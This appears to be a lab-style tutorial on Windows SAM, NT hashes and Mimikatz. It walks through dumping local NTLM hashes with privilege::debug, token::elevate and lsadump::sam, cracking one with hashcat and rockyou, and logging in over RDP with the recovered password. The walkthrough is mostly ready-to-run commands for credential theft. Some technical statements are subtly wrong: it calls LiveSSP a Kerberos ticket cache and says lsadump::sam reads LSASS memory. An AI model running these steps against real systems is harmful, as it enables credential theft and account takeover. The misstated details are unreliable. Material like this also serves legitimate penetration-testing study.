NTLM, SAM & Mimikatz Overview

Published on June 25, 2025


What is SAM?

The Security Account Manager (SAM) is a Windows database (C:\Windows\system32\config\SAM) that stores local user account information and password hashes. The file is held open by the OS while Windows is running, so it cannot simply be copied. To protect it against offline attacks, older Windows versions used SYSKEY to encrypt parts of SAM.

What is NTLM?

The NT hash (NTHash, commonly called the NTLM hash) is the unsalted MD4 hash of the user's password encoded as Unicode (UTF-16LE). Microsoft moved from LM hashes (weak: the password is split into two 7-character halves, each used as a DES key) to NT hashes on modern systems. The NT hash is case-sensitive and supports longer passwords, but it still has no salt, so identical passwords always produce identical hashes, which makes it vulnerable to precomputed attacks (rainbow tables) and offline cracking.

Overview of Mimikatz

Mimikatz is a post-exploitation tool by Benjamin Delpy (“gentilkiwi”) that:

  • Extracts plaintext credentials, Kerberos tickets, and NTLM hashes from LSASS memory.
  • Performs pass-the-hash, pass-the-ticket, and token elevation.
  • Requires Administrator privileges and SeDebugPrivilege to read LSASS.

Step-by-Step: Extract & Crack NTLM Hash

1. List Local Users

PS C:\Users\offsec> Get-LocalUser

Explanation: Lists all local accounts; identifies target user (e.g., nelly).

2. Run Mimikatz as Administrator

PS C:\Windows\system32> cd C:\tools
PS C:\tools> .\mimikatz.exe

Explanation: Launches Mimikatz from the folder where it is stored (C:\tools here).

3. Enable Debug Privilege & Elevate to SYSTEM

mimikatz # privilege::debug
mimikatz # token::elevate

Explanation: privilege::debug activates SeDebugPrivilege; token::elevate impersonates the SYSTEM token.

4. Dump NTLM Hashes from SAM

mimikatz # lsadump::sam

Explanation: Extracts NTLM hashes from the locked SAM database via LSASS memory.

5. Retrieve the Hash on Kali

echo "3ae8e5f0ffabb3a627672e1600f1ba10" > nelly.hash

Explanation: Saves the extracted NTLM hash of nelly to a file for cracking.

6. Identify Hashcat Mode for NTLM

hashcat --help | grep -i ntlm

Explanation: Reveals that mode 1000 corresponds to NTLM hashes.

7. Crack with Hashcat

hashcat -m 1000 nelly.hash \
  /usr/share/wordlists/rockyou.txt \
  -r /usr/share/hashcat/rules/best64.rule \
  --force

Explanation: -m 1000: NTLM mode; rockyou.txt: password list; best64.rule: common mutations; --force: override warnings.

Result: nelly: nicole1

8. Verify via RDP

mstsc /v:192.168.50.210 /u:nelly

Explanation: Launches Windows RDP client; enter nicole1 when prompted.

Key Takeaways

  • SAM holds unsalted NTLM hashes—offline cracking is easy if you can extract them.
  • LM hashes are obsolete; modern attacks target NTLM or LiveSSP (Kerberos ticket) caches.
  • Mimikatz’s sekurlsa and lsadump::sam modules extract credentials from LSASS.
  • Administrator & SeDebugPrivilege (or SYSTEM) are required to read LSASS memory.
  • Always combine enumeration (Get-LocalUser), extraction (Mimikatz), and cracking (Hashcat) for the full workflow.
